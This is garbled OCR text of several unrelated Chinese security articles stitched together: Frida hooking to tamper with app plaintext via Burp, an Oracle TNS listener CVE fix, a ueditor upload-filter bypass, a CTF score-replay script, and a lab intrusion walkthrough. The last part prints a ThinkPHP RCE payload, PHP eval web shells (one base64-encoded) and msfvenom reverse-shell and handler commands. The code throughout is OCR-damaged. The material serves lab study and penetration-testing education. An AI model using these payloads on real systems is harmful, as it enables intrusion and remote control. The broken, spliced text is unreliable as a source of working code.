架 ， 相 比 Xposed 和 Substrace Cydia 更 加 便捷 ， 可 以 向 Windows，Mac，Linux，iOS 和 Android 上 的 
APP 注 入 Javascript 代 码 片段 ， 并 完全 访问 程序 的 内 存 。 内 置 对 Java 和 Objective C 运 行 时 支持 ， 架 
构 如 下 所 示 : 





frida 提供 多 语言 绑 定 : 

° frida-python ( 含 cli) 
* frida-node 

• frida-qml 

• frida-swift 

° frida-clr 


Android, iOS 设备 ， 甚 至 是 与 frida 
binding 运行 的 同一 台 计 算 机 
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message; = 


» $ 


Frida 中 有 个 消息 机 制 ， 利 用 它 可 以 与 注入 到 APP 中 的 脚本 互相 发 送 消 息 ， 从 而 达到 数据 传输 的 目 
的 ， 在 Python 中 可 注册 Message 回 调 函 数 ， 利 用 它 来 处 理 接收 与 发 送 消息 。 


from Тиінге import print function 
import frida 
import sys 


session - frida.attach("hello") 
Script - session.create script(""" 
recv('poke', function onMessage(pokeMessage) 4 send('pokeBack'); }); 
E 
def on message(message, data): 
print(message) 
script.on('message', on message) 
script.load() 
script.post({"type": "poke"}) 
sys.stdin.read() 


阻塞 并 等 待 输入 


你 可 以 在 JavaScript 脚 本 中 使 用 recv.wait 来 阻塞 进程 ， 当 我 们 在 Burp Suite 中 修改 请 求 时 ， 脚 本 会 等 
待 响应 ， 然 后 执行 回调 函数 。 利 用 这 个 功能 ， 可 以 在 加 密 前 发 送 明 文 消息 到 远程 服务 器 ， 阻 塞 并 等 
待 我们 修改 后 的 明文 返回 到 APP 进 程 ， 从 而 远程 动态 的 修改 明文 信息 。 
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from future _ import print function : ” 
import frida 
import sys 


session = frida.attach("hello") 
script = session.create script(""" 
Interceptor.attach(ptr("96s"), ( 
onEnter: function(args) { 
send(args[0].toString()); 
var op - recv('input', function(value) 4 
args[0] - ptr(value.payload); 
13i 
op.wait(); 
} 
1); 
ттеу аар 26)) 
def on message(message, data): 
print(message) 
val - int(message['payload'], 16) 
script.post({'type': 'input', 'payload': str(val * 2)}) 
script.on('message', on message) 
Script.load() 
sys.stdin.read() 


原理 分 析 


APP 在 数据 加 密 前 将 明文 发 给 Burp Suite, Burp Suite 在 人 为 修改 数据 后 发 给 回 显 服务 程序 ， 回 显 服 
务 程序 打印 Burp Suite 发 来 的 修改 后 的 数据 后 ， 将 这 个 数据 发 给 APP。APP 内 部 脚本 在 收 到 回 显 服 
务 程序 发 来 的 数据 后 判断 这 个 数据 是 哪 来 的 ， 如 果 是 APP 没 加 密 之 前 的 数据 就 发 给 Burp Suite， 如 
果 是 回 显 服务 程序 发 来 的 数据 就 进行 下 一 步 加 密 ， 然 后 再 发 给 正常 的 服务 器 进行 正常 的 请 求 。 在 这 
里 我 们 就 实现 了 利用 远程 服务 器 动态 修改 APP 内 部 数据 ， 从 而 绕 过 加 解密 过 程 ， 达 到 访问 明文 数据 
的 目的 。 


实战 演示 
Burp Suite 设置 监听 


首先 设置 Burpsuite 监 听 端 口 ， 这 里 用 于 监听 APP 内 脚本 发 送 过 来 的 数据 ， 假 设 监听 10000， 然 后 设 
置 重 定向 到 本 机 17000 端 口 ， 该 端口 为 我 们 自己 写 的 回 显 服务 器 监听 端口 : 
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К 


[кеен HTTP history | WebSockets history | Options 


| Q Proxy Listeners EË; Edit proxy listener 


| (9) Burp Proxy uses listeners to receive incoming HTTP requests from your browse Í Binding Request handling Certificate | 
= LLL d 


Running — Interface Invisible Redirect 
ii 192 168 137 1 10000 












3 Q) These settings control whether Burp redirects requests received by this 


Redirect to host. 127 00 1 





pm Redirect to port 17000 


Force use of SSL 


Each installation of Burp generates its own CA certificate that Proxy listeners car 
Invisible proxy support allows non-proxy-aware clients to connect directly 


| Import / export CA certificate Reaenerate CA certificate wa 


HOOK 脚 本 发 送 HTTP 请 求 


“上面 我 们 已 经 监听 好 了 端口 ， 那 么 我 们 需要 将 HOOK 脚 本 的 Python 端 on_message 中 收发 的 消息 数 
“ 据 使 用 http 方 式 发 送 到 Burp Suite 中 : 


def deal message(payload): 
if 'encrypt' in payload: 

headers - ("Content-Type": "text/plain") 

req - requests.request( 
'FRIDA', 
"http://%s:%d/' 96 (BURP HOST, BURP PORT), 
headers-headers, 
data-str(payload['encrypt'].encode('UTF-8')).strip('b N' ')) 

script.post(('type': 'input', 'payload': req.text)) 


JavaScript 脚 本 阻塞 


在 注入 APP 中 的 JavaScript 脚 本 中 阻塞 来 接受 修改 完成 的 明文 数据 ， 在 onEnter 函 数 中 使 用 wait 来 等 
待 回 显 服务 器 发 来 的 修改 好 的 数据 : 


Interceptor.attach(hook.implementation, í 
onEnter: function (args) { 
send(('encrypt':Memory.readUtf8String(param.bytes(), param.1 
var op = recv('input', function(value) í 


3); 


op.wait(); 


}, 
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Python 端 创建 一 个 简单 的 HTTP 服 务 器 ， 负 责 与 Burp Suite 通 信 。 


` 


我 在 这 里 使 用 了 http. server 创 建 了 个 本 地 服务 器 ， 监听 17000 端 口 , Burp Suite proxy 模 块 中 设置 
发 数据 发 送 到 127.0.0.1:17000 地 址 。 


def do FRIDA(self): 
request path - self.path 


request headers - self.headers 
content length - request headers.get('content-length') 


length - int(content length) if content length else 0 


self.send response(200) 
self.end headers() 


self.wfile.write(self.rfile.read(length)) 


效果 
远程 修改 明文 数据 





# Host Method URL Params Edited Status Length МІМЕ {уре Exter 
1 http./127 0.0.1 17000 FRIDA "i 200 1403 JSON 
2 http /127 00 1 17000 FRIDA м 200 1598 JSON 
3 http.//127 0.0.1:17000 FRIDA  / У 200 1455 JSON 
X Ж 





| Request | Response | 








Raw | Params | Headers | Hex | JSON Beautifier | 


FRIDA / НТІР/1.1 
Host: 192. 168. 137. 1: 10000 
User-Agent: python-requests/2. 2 





Accept-Encoding: gzip, deflate 
Accept: ж/ж 

Connection: close 
Content-Type: text/plain 
Content-Length: 12 





‚ altitude": 0.1 
КІ 
057, "manufacturer : 
d viceEs “ІРгоре r ty 
tamp ; 





修改 后 再 加 密 发 送 
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Host Method URL һ MME pe Exter 





E 

1 http./127 0.0 1 17000 FRIDA | "ES 

2 http./127 0 0 1 17000 FRIDA / 

3 http-//127 0 0 117000 FRDA / сл "— 

< i og 





Request | Response 


| Raw | Params | Headers | Hex JSON Beautifier | 






FRIDA / HTTP/1.1 

Host: 192. 168. 127. 1:10000 
User-Agent: python-requests/2. 22. 0 
Accept-Encoding: gzip. deflate 


Accept: ж/ж 

Connection: close 
Content-Type: text/plain 
Content-Length: 1264 





б”, “opType : 1 


Dx version’ £ 
d4 s SERE 7901 


erifyCode 





















tionProper 
se deviceToken”:”68bc1 







altitude :”9. 







O46FUGI 
57, “manufacturer”: “Apple”, “density 88866”, "osVersion':' 11.0 0”, “wi dthPix е 
ісеЕхіРгорегіҙ”: (“аррМапе” D. š PhoneName : iPhone 





JEN "178504887245", "userPermissions": Notification” Y ], x type :” 


总 结 


”上 面 我 们 实现 了 加 密 之 前 明文 的 获取 ， 而 解密 过 程 类 似 ， 有 兴趣 的 朋友 可 自行 尝试 ，Frida 更 多 神奇 
的 功能 等 待 小 伙伴 们 去 解锁 ， 至 此 我 们 实现 了 通过 Frida 利 用 远程 服务 器 动态 修改 APP 中 我 们 需要 的 
”明文 数据 和 解密 返回 包 ， 省 去 了 手工 逆向 分 析 算法 ， 实 现 加 密 、 解 密 这 一 套 流程 ， 再 也 不 用 担心 面 
对 头皮 发 麻 的 一 堆 乱七八糟 的 "天书 " 了 ! 
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RREKIN Z oracle DERI ARE REA 
) 


前 言 


监听 (listener) 是 什么 


监听 器 是 Oracle 基 于 服务 器 端的 一 种 网 络 服 务 ， 主 要 用 于 监听 客户 端 向 数据 库 服 务 器 端 提出 的 连 
接 请 求 。 既 然 是 基于 服务 器 端的 服务 ， 那 么 它 也 只 存在 于 数据 库 服务 器 端 ， 进 行 监听 器 的 设置 也 是 
在 数据 库 服务 器 端 完成 的 。 


oracle 网 络 配置 有 三 个 配置 文件 listener.ora，tnsnames.ora，sqlnet.ora， 其 目录 均 在 
SORACLE HOME/network/admin 。 


Oracle 客 户 端 与 服务 器 端的 连接 是 通过 客户 端 发 出 连接 请 求 ， 由 服务 器 端 监听 器 对 客户 端 连 接 请 
求 进行 合法 检查 ， 如 果 连 接 请 求 有 效 ， 则 进行 连接 ， 否 则 拒绝 该 连接 。 服务 注册 : 


Listener 


Service names, 
instance names, 
network addresses 


Instance 


Listener 监听 器 架构 : 











fe Z 
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Client 


Web 
Browser 











HTTP 
Presentation 
over TCP IP 





Listener 


EN ag Oracle Database 
e alios] t Supports HTTP 
ж / 
[^ 


TT 
Presentation 
over TCP.IP 


Intranet 





Oracle 协 议 支 持 


Oracle 协 议 支持 层 位 于 Oracle Net 基 础 层 和 网 络 协 议 层 之 间 ， 负 责 将 TNS 功 能 映射 到 客户 端 /服务 
连接 中 使 用 的 行业 标准 协议 。 该 层 支 持 以 下 网 络 协议 : 


TCP / IP 
带 SSL 的 TCP / IP 
命名 管道 


SDP 


— ЖЕНА 


Oracle 2012 年 发 布 的 告警 ，CVE-2012-1675 漏 洞 是 Oracle 允 许 攻击 者 在 不 提供 用 户 名 /密码 的 情况 
下 ， 向 远程 *TNS Listener" 组 件 处 理 的 数据 投 毒 的 漏洞 。 举 例 ; 攻击 者 可 以 再 不 需要 用 户 名 密码 的 情 
况 下 利用 网 络 中 传送 的 数据 消息 (包括 加 密 或 者 非 加密 的 数据 )， 如 果 结 合 (CVE-2012-3137 漏 洞 进 
行 密码 破解 ) 从 而 进一步 影响 甚至 控制 局 域 网 内 的 任何 一 台数 据 库 。 


二 、 漏 洞 解决 方案 


Oracle 官 网 给 出 两 种 不 同 环境 解决 方案 ( 


分 为 RAC 和 非 RAC 环 境 ， 而 我 们 这 次 针对 的 是 单 实例 Oracle 环 境 下 。 


1. 停 止 监听 SQL>lsnrctl stop 
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2. 使 用 TCP 协 议 设备 COST 限 制 注册 本 地 实例 


编辑 listener.ora， 在 文件 未 尾 增加 SECURE_REGISTER_listener_name = (TCP)， 命 令 作用 为 限制 
实例 注册 ， 并 限定 注册 协议 为 TCP。 


ее (配置 该 参数 后 PL/SQL 客 户 端 将 无 法 访问 
Oracle 


编辑 listenerora， 在 文件 未 尾 增加 DYNAMIC_REGISTRATION_LISTENER =off 
DYNAMIC REGISTRATION LISTENER = off 


ADR BASE LISTENER = /uOl/app/oracle 


ISTENER = 


#LISTENER UAT2 
#LISTENER = 
a (t 
(PROTOCOL = >) (HOS FK? -APPDB -UAT2) 


Par PEN: za a D. 2 АТ? admin? 





SECURE REGISTER LISTENER = (TCP) 


4. 修 改 remote listenerBR (关键 ) 





SQL>show parameter list # 查 看 参数 配置 
SQL>alter system set remote listener-'(DEACRIPTION = (ADDRESS LIST = (ADDRESS 
SQL>show parameter remote listener # 查 看 远程 监听 是 否 配置 生效 








SQL> show parameters list 


listener networks strinq 

local_listener string 

remote listener string (DESCRIPTION = (ADORESS LIST = 
(ADDRESS = (PROTOCOL = TCP)(H 
OST = FK2-APPOB-UAT2) (PORT = 1 
521))) (CONNECT DATA = (SERVER 
= DEDICATED) (SERVICE NAME = ed 
wdb))) 

SQL> 

SQL> alter system register; 


System altered. 





SQL»alter system register # 修 改 系统 注册 
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=. ЖИШШ 
1. 以 述 配 置 修改 后 ， 需 要 重启 监听 


SQL>lsnrctl start 


2.# listener 


$lsnrctl services 


查看 是 否 有 remote server， 如 不 存在 ， 即 已 修复 。 





did not 


ener command 
С DATA-(* 


> * (CONNECT 


t 
4 


(CONNECT DAT Am (< 
service r 

mm and 
service r 


command 


egister 
did r 
egist 
did 


not 


(CONNECT 
Mon : 


16-2Ut-20198 19: 14 service register 


TNS- 01194 The listener command did not 

16- Ла 2018 9:31 * service register 

TNS -01194: 1 ommand did not 
' Mon Jul 16 19:32:12 2018 


»10-armdb )(« 


ОАТА- (5 





arrive an 


ID 
I D ( PROGRAM = } (HOS 
чс 
arri 


N 


arrive ure 5 


IO-armdb) (¢ PROGRA 
мы 

arti 

М 

arrive 


查看 日 志 中 是 否 有 


Service register NSGR * 1194 记 录 ， 如 有 该 记录 说 明 已 拒绝 注册 ， 说 明成 功 修复 该 漏洞 。 
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记 一 次 ueditor 老 版 本 的 非常 规 getshell 
前 


本 篇 文章 是 关于 一 次 渗透 测试 中 意外 get she11 的 记录 ， 属 于 ueditor v1.3.x 的 aspx 语 言 的 非 网 上 流传 和 


ІН 


经 过 


起 因 是 针对 某 客户 网 站 进行 渗透 测试 时 ， 发 现 了 一 个 ueditor 编 辑 器 路 径 ， 并 且 网 站 是 aspx， 经 验 丰富 的 渗 ; 


d 


== - ~ 


иріоаа 617 KB x. 


Е Config.cs 269 字 节 Vi: 
fileUp.ashx 1.41 KB А< 
getContent.ashx 1:13 KB. AS 
getMovie.ashx 1.22 KB А< 
getRemotelmage.ashx 4.03 KB AS 
imageManager.ashx 1.87 KB AS 
imageUp.ashx 2.02 KB AS 
scrawlUp.ashx 1.91 KB AS 

Ej Uploader.cs 7.18 KB Vi: 

¥_]Web.config 438 字 节 XN 


后 了 解 ，ueditor 在 1.4.x 版 本 对 整体 设计 架构 进行 改版 ， 在 v1.3.X, 还 是 离散 的 功能 文件 存在 的 ， 上 4 
功能 在 \ueditor3wmetfileUp.ashx。 代 码 如 下 : 
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public void PrecessRequest (HttpContext context) 
1 


contezt.Response.ContentType = "text/plain"; * « » y ` 
// 上 传 配 置 
str ing pathbase - "орь оад/ С ies 
str Sg filetype - z me ".mkv", "avi", rm шуюр .npeg mpg 
int size - 100; ус 大 Чий, rt IMB, T mom nfig E к йя Mec м: oors” 


Hu Efe 文件 
аз t info = 


ase, filetype, size); // 获 取 上 传 状态 





context.Response.Write|"['state':'" + info["state"] + "','url':'" + info["url"] + "','fileType':'" + infol"currentType") + 


本 意 是 对 .net 进 行 代码 审计 ， 发 现 是 否 存在 安全 漏洞 (虽然 通过 搜索 引擎 并 未 找到 这 种 信息 ) ， 但 
是 有 意思 的 是 在 我 审计 出 来 之 前 ， 先 前 开启 的 burp 的 后 绎 fuzz 已 经 有 所 发 现 。 框架 使 用 的 是 白 名 

单 ， 并 重 命 名 ， 但 是 代码 层面 存在 两 点 不 足 。 第 一 点 是 获取 后 组 的 函数 是 自 定 义 的 ， 并 且 存 在 逻辑 
问题 。 这 部 分 代码 存在 于 \ueditor3\net\Uploader.cs:190 


private string getFileExt() 


( 
string[] temp - uploadFile.FileName.Split('.'); 


return "." + temp[temp.Length = 1].Tolower() ; 
) 
简单 来 说 ， 该 函数 就 是 以 `… 为 分 割 符 ， 得 到 一 个 文件 名 信息 的 字符 型 数组 ， 并 获取 数组 最 后 一 个 
值 ， 在 前 面 添加 '… 后 作为 后 缀 返回 。 这 里 存在 一 个 问题 ， 如 果 所 传 的 字符 不 存在 点 字符 ， 文 件 名 以 
点 分 割 获取 的 数组 只 有 一 个 值 也 是 最 后 一 个 值 ， 如 ，'pdf'。 该 函数 最 后 返回 的 值 将 是 .pdf。 从 而 绕 
过 白 名 单 的 检查 。 
private bool checkType(string[] filetype) 


{ 
currentType = getFileExt(); 
return Array.IndexOf(filetype, currentType) == -!; 


) 
另 一 个 问题 就 是 文件 名 的 生成 过 程 ， 文 件 名 是 随机 生成 的 ， 但 是 随机 生成 的 决定 参数 是 前 端 
fleNameFormat 传 入 ， 格 式 是 fflenamej{frand:6}， 最 简单 办 法 就 是 直接 将 该 参数 改 为 字符 串 ， 不 会 
被 正则 匹配 ， 直 接 拼 接 入 文件 名 。 同 时 此 时 获取 后 缀 的 函数 使 用 asp.net 自 带 的 获取 后 缀 的 方法 
Path.GetExtension(filename), (这 里 只 想 说 不 知道 开发 是 怎么 想 的 ) ， 该 函数 获取 pdf 中 后 缀 的 值 
为 空 。 所 以 最 后 保存 的 文件 名 只 由 format 决 定 。 
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public static string Format{string format, string filename) * 
{ De . ” 

if (String.IsNullOrWhiteSpace (format)) 

t 

format - : : 

) жене. 

s nj ext ж Path.GetExtension(iiiename); 
filename = Path.GetFileNameWithoutExtension (filename); 
format = format.Replace( , filename); 













format new Regex (@"\ (гапа (\:7) (XG*) V)", RegexOptions.Compiled).Replace(format, new MatchEvaluator (delegate (Match match) 
4 

ray digit = 

if (match.Groups.Count > |) 

{ 

digit = Convert.ToInt32(match.Groups[ ].Value); 
} 
r rand = new Random(); 

return rand.Next((is*)Math.Pow( , digit), (int)Math.Pow(.°, digit + °)).ToString(); 
y; 
format - format.Replace( , DateTime.Now nc 0): 
format - format.Replace( , DateTime.No: z 
format = format.Replace( , (DateTime.Now.Year & oStrina( )) 
format = format.Replace( , DateTime.Now.Month.ToS у); 
format = format.Replace( , DateTime.Now.Day.ToS yy; 
format = format.Replace( , DateTime.Now.Hour. +; 
format = format .Replace ( , DateTime.Now.Minute.To 9; 
format = format.Replace( , DateTime.Now.Second. yy; 
var invalidPattern = new Regex(8"[NNX/V:N*323042N 2X 11") ; 
format = invalidPattern.Replace (format, ME 





return format + ext; 


这 里 完成 了 对 1.3.6 版 本 的 分 析 ， 同 时 我 也 搭建 了 jsp、php 本 部 的 和 v1.4.3 的 ueditor 对 应 的 三 种 语言 
的 靶场 ， 经 查看 ， 这 几 种 均 使 用 语言 自 带 的 获取 后 绎 的 函数 。 所 以 该 利用 方法 也 只 能 在 v1.3.x 的 
aspx 环 境 下 复 现 。 


总 结 


v1. 3 .x 的 市 场 覆 盖 率 确实 较 1.4.3 低 了 很 多 ， 希 望 能 帮 碰 到 该 环境 的 老 哥们 多 拿 一 个 shel11 吧 ! 如 有 ， 错 误 ; 


+ 


2023 


So 


云 安全 共 测 大 赛 初赛 gameapp 题 目 解析 


打开 网 页 ， 页 面 显示 “你 能 得 到 99999 分 吗 ” 
= Э С ( О Notsecure | 121.40.219.183 


EI Apps > Google Нш € IM = же бы (Ж im Comole| Goudi, Фо Ә 127.00 


你 能 得 到 95999 分 吗 


看 到 还 有 个 附件 下 载 下 来 为 一 个 apk 文 件 


з seu 打开 


(ái 


* 
иа 


Ж 


iin 


› ЖЕ › К > abBebec4-63ac-4276-973d-c5e53e971668 (2) > attachment 


ж ЖЕТСІН A oe 


1% app.apk 


8-4€ 
拖 到 夜 神 模拟 器 里 面 安装 
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BM ELAR OD 


00 CTF2019 Mobde 





打开 APP， 看 起 来 是 个 游戏 APP 






121.40.219.183:9999 


admin 


开始 游戏 


玩 了 下 ， 是 个 打 飞 机 的 游戏 ， 根 据 上 面 的 提示 需要 玩 到 99999 才 会 有 惊喜 ， 显 然 手 残 党 是 不 可 能 达 
到 99999 分 的 。 
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| z | 
| 飞机 大 战 分 数 | 
| 2 | 
| | 
| -— 1 
| E: 重新 开始 | 





在 模拟 器 中 设置 http 代 理 





在 本 地 使 用 fiddler 抓 包 


WiredSSID 


服务 器 主机 名 


192.168.1.103 


8888 


下 网 址 不 使 用 代理 
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R. iear Cache ДЕ iextWizard je iearott MSDN Search p 


Ó sumens А чела £ Алойефопбе Composer ШІ dderOresaBe Ор mddeseet Gl tog [J Piters = Tereine 


Headers Тектен Syntaxview WebForms Hexiew | Auth Cookes [Raw БО ХМ 


— 
















post 2321. eis anacthase. TR — 
bntent-typ: x 

user-agent: Dalvik/1.56.0 (Linux; Ú; android 4.4.2; $M-G955F Buil 

HOST: 121.40.219.183:3359 d 355366) 
Konnection: keep-alive 
jaccept-Encod'ng: 0210 ^ ) : е 
Kookie: sessionseyJwbGFSZXINO JhZG1pbiISION]D32lI3037Q. XYROIW. 9KvqT T Б 
icontent-Length: 175 WOT SSR 3шххепвб Jour tau? 9 


IQ) TwItGnSuves apOwIBKZQkruMo POW Vwk SY YGAGLTR SSdKNYbOIDQDZRVEBSETHY. oMGkeDdsep 
3 |fivzkGen)2BUPKSBTSWNBSnXBUK 20v QE LY Tw HOXAC OWk AGyTDV RT SR ALPHA) ына eave 
vC2G4HZ7X 1h1My SD 9wa 











| 
| 
[ MÀ 


Transformer | [Headers TextWew | SyntaxView isgeve кейек Webyew Auh Cacing Союз Raw ON 


INTTE/1.0 200 ox 
Cache 
Date: Fri, 20 Sep 2019 05:44:57 GMT 


Cookies / Login 


SetCookie: session sey JubGF SZXDOURZG 1pblsInNib I Mow FQ. ХАМИР KeuGwWIUYCfDcondM JUdywGOrnmo; HttoOnly; Patha 
Entity 





Content-Type: text/tmi; charseteutf-8 
Miscellaneous. 
Server: Werkzeug/0. 15.6 Python/2. 7.12 


打 爆 一 只 飞机 RN A ME 


К Mem t 


POST + Л 
Ontent-type: хах 
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; ЗМ-0955Е Butla ILII? 

HOST: 121.40.219.183:9999 

onneccion: Keep-alive 

Accept-Encoding: gzt 

OKIE: Sesstaraey IWHGFS THT IG JhZGipbtIsinNjo2211jowfQ x YR i. kvuGwIUYC сол 3udaGD5r nmo 
ontent-Length: 175 


vx жеке oer 













SMDQC оо0уо61т03С/ TEUGRTYRIrOxOhtJaDyT, 9r PROXUtISNWEMGP 325 JaTk DBGAXWTLLWXYES 
34v BXHENZ QUMASELHBLDSITOSKKYGACCy Or TIZN TRV qwockxNwiruBl ez 1900397 KISS JmNTwkoy 
PEZWIISHIZOYWTNSwh Y= 








Date: Fri, 20 Sep 2019 05:44:59 GMT 
Vary: Cooke 
Cookies / Login 
Set Cooke: session se yJwbGF О ран): о К. КҮКРИ gp i UEMdÉI EY 76 2Ғе316Ғ24; HttpOnly: Fatha/ 
Entity 
Content-Length: 1 
Content-Type: бехт; charset=utf-8 
Miscellaneous. 
Server: Werkzeug/0. 15.6 Pythoni2.2.12 


打 爆 第 二 只 飞机 查看 APP 发 送 的 数据 包 
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+ Q Clear Cache Д TextWizard [E Tearo MSDN Search. W 


POST nern Made St ZAR ASL IO score. WTTP/1.1 
НЕСІІЗ 

Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; 5М-0955Ғ 81110215366 
2 121.40.219.183:9999 d 

iconnection: Keep-Alive 

Accept-Encoding: gzip 

OOK: sessioneeyJwDGFSZXI10: ^ZG1p5 ISInNjb3211jOwfQ. хуй пәк. 90 WUEMdGT4EYQ? 

ontent-Length: 175 


$xDqCgoQvoG1mb8C /TEUQR TYR IrDxOht2abyT Sr PRQKUTISNWIMGP +325 JATK DBGANWTLLWXVE + 
*Q4VBSNHENZ OMA DEL MBLOS I TOSKK YGACC y pr T ZZ NT ev quOCXxNWIT uBZ «2 2800357335 57: 
PEZWIISHIZOVWT NSW Үт 











безі... (guess Сі гейде to highight af) 


jHTTR/S. 0 200 Ж 
Cache 
Date: Fri, 20 Sep 2019 05:45:26 GMT 
Vary: Cookie 
Cookies / Login 
Set-Cogioe: session ey Hb GFSZXDO TS 1ptylsintub ЗнО X Ride. t9 O90 AL Е TOFY Cony 79n£25; HttpOniy; Paths] 
Entity 
Contentiength: 1 
Content-Type: text/htmi; charseteutf-s 
Miscellaneous 
Server: Werkzeug/0. 15.6 Python/2.7.12 





”尝试 解密 session， 可 惜 解密 出 来 的 内 容 没什么 用 处 


basotats 


tasei6. ba 


Xii0ilh26ipsiltIohjb33iljowfQes 





"US — baseó4 子 行 集 utfb(unkodeizii 


("player":"sdein", sçore":e) 
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在 尝试 破解 session 密 钥 看 看 是 否 有 什么 信息 ， 这 个 session 是 jwt， 利 用 jwt 解 密 脚 本 跑 了 好 久 都 没 跑 
出 来 





然后 看 了 下 把 session 复 制 过 来 重新 发， 可 以 持续 加 分 数 


import requests 
url = 'http://121.40.219.183:9999/score/' 


body = "OAJZiuZqnBwNco1SD-*XLYENOq1fnZSecbtn4aReWWJGwNarE2XqwabMdBJAwISqDOkfPAKiS 
cookie = "session-eyJwbGF5ZXIiOiJhzGipbiIsInNjb3J1IjoxMTIWMjd9.XYRfFw.y7P5sCLQOi 
for i in range(1, 99999): 

print (cookie) 

print(i) 

headers = ('User-Agent' : 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-G955F E 

response - requests.post(url, data - body, headers - headers) 

cookie = response.headers['Set-Cookie'] 

&print(cookie) 

print(response.text) 
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= 


成 功 跑 出 flag 





三 层 靶 机 搭建 及 其 内 网 渗透 ( 附 靶 场 环境 ) 


0x00 前 言 


正好 前 段 时 间 写 了 篇 文章 ， 关 于 内 网 渗透 的 ， 已 经 发 布 在 我 自己 的 博客 里 了 ， 顺 便 也 投 在 这 里 (其 
实 这 个 人 就 是 想 要 积分 人 ) 


在 搭建 的 内 网 环境 中 ， 有 三 台 主 机 ， 每 台 我 都 放 了 多 个 flag， 本 文 将 只 讲述 每 个 靶 机 的 攻击 过 程 ， 
对 于 flag 的 获取 不 做 讨论 ， 这 点 需要 读者 自己 动手 找到 这 些 flag. 


0x01 环境 搭建 


三 层 靶 机 的 OVA 文 件 下 载 地 址 在 此 : 





简单 对 主机 搭建 的 环境 画 了 个 网 络 拓扑 ， 攻 击 机 的 网 段 在 192.168.1.1/24， 三 台 靶 机 的 IP 地 址 分 别 
如 下 所 示 。 


Ы = 


Attack Target 2 Target + 
182. 168. 1. XX 192. 168 n i [үйпет1] 182. 168. 22, 22 [ҮМпет2] 192. 168. 33. 33 in; пе12] 
192. 168. 22. 11 [VMnet2] 192. 168. 33. 22 [УМпет3: 
192. 168. 1. 1/24 192. 168. 22. 0/24 192. 168. 33. 0/24 


Vmware 的 3 个 网 卡 分 别 配 置 为 桥接 ， 仅 主机 和 仅 主机 ， 具 体 子 网 地 址 如 下 图 所 示 。 





名 称 类 型 ali ( EMER DHCP 子 了 网 地 址 
VMnet2 Dind ы eis > 192.168.22.0 
мез раа - Ed 192.168.33.0 | | 
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如 果 你 想 在 自己 的 电脑 上 搭建 此 靶场 的 话 ， 需 要 先 将 自己 Vmware 中 的 虚拟 网 络 编辑 器 编辑 成 图 2 的 
样子 ， 之 后 将 三 个 靶 机 的 OVA 文 件 导入 到 自己 的 VMware 中 即 可 ， 这 三 个 虚拟 机 的 !P 地 址 我 都 已 经 


手动 分 配 成 了 图 1 的 样子 。 





OS detection performed. Please report any incorrect results at . Nmap 


done: 1 IP address (1 host up) scanned in 8.97 seconds 


可 以 看 到 Target1 存 在 ftp、ssh、http 等 端口 ， 且 是 一 个 Linux 的 操作 系统 。 


2、 既 然 存在 http 服 务 ， 那 就 用 浏览 器 打开 看 看 是 个 什么 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS3.png) 
3、 原 来 是 ThinkPHP 5 .X 框 架 ， 这 不 禁 让 我 想到 18 年 底 爆 出 的 该 框架 的 远程 命令 执行 漏洞 ， 那 就 先 用 P0C 测 


» 


lindex.php? 
sxindexAthinkXapp/invokefunction&function-call user func array&vars[0]-phpinfo&vars[1][]-1 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS4.png) 

4、 成 功 出 现 了 PHPinfo 界 面 ， 说 明 该 版 本 是 存在 这 在 漏洞 的 ， 接 下 来 就 可 以 直接 上 工具 写 入 一 句 话 了 ， 当 然 
!'[T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS5.png) 

5、 在 工具 中 命令 是 可 以 被 执行 的 ， 那 就 getshe11 吧 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS6.png) 

6, ~ getshell 失 败 ， 没关系， 直接 echo 写 入 一 句 话 


echo "<?php Qeval($ POST[TeamsSix']);?»" > shell.php 
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![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS7 . png) * 
7、 通 过 浏览 器 访问 ， 查 看 shel1. php 是 否 上 传 成 功 

! [T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS8.png) 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS9.png) 

8、 可 以 看 到 she11.php 已 经 被 上 传 上 去 了 ， 但 是 提示 语法 错误 ， 同 时 蚁 剑 也 返回 数据 为 空 ， 看 来 一 句 话 上 传 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS10.png) 






之 前 : <?php Geval($ POST[TeamsSix]);?» 之 后 : <?php Q'eval(( TeamsSix]);?» 


9、 不 难 发 现 $_POST 被 过 滤 了 ， 那 就 利用 Base64 编 码 后 再 次 上 传 试 试 


echo "PD9waHAgQGV2YWwoJF9QT1NUWydUZWFtc1NpeCddKTs/Pg--" | base64 -d > 
shell.php 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS11.png) 
'[]J(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS12.png) 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS13.png) 
109、 此 时 可 以 看 到 一 句 话 已 经 正常 ， 蚁 剑 也 能 够 连接 成 功 ， 此 时 已 经 获取 到 该 主机 的 shell， 下 一 步 添加 代 焉 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS14.png) 


ян b、 设 置 代理 
>: 本 文中 设置 代理 的 方法 参考 安全 客 里 面 tinyfisher 用 户 的 一 篇 文章 ， 其 文章 地 址 在 本 文 未 尾 参 考 文章 , 


1、 查 看 自己 的 ITP 地 址 ， 并 根据 自己 的 ITP 地 址 及 目标 靶 机 的 系统 类 型 生成 对 应 的 后 门 文件 


root@kali:~# ifconfig root@kali:~# msfvenom -p linux/x64/meterpreter/reverse tcp 
LHOST=192.168.1.113 LPORT=6666 SessionCommunicationTimeout=0 
SessionExpirationTimeout=0 -f elf »shell.elf 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS15.png) 
2、 在 kali 中 配置 运行 监听 模块 


root@kali:~# msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set 
payload linux/x64/meterpreter/reverse tcp msf5 exploit(multi/handler) > set Ihost 0.0.0.0 msf5 
exploit(multi/handler) > set Iport 6666 msf5 exploit(multilhandler) > options msf5 
exploit(multi/handler) » run 


'[T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS16.png) 
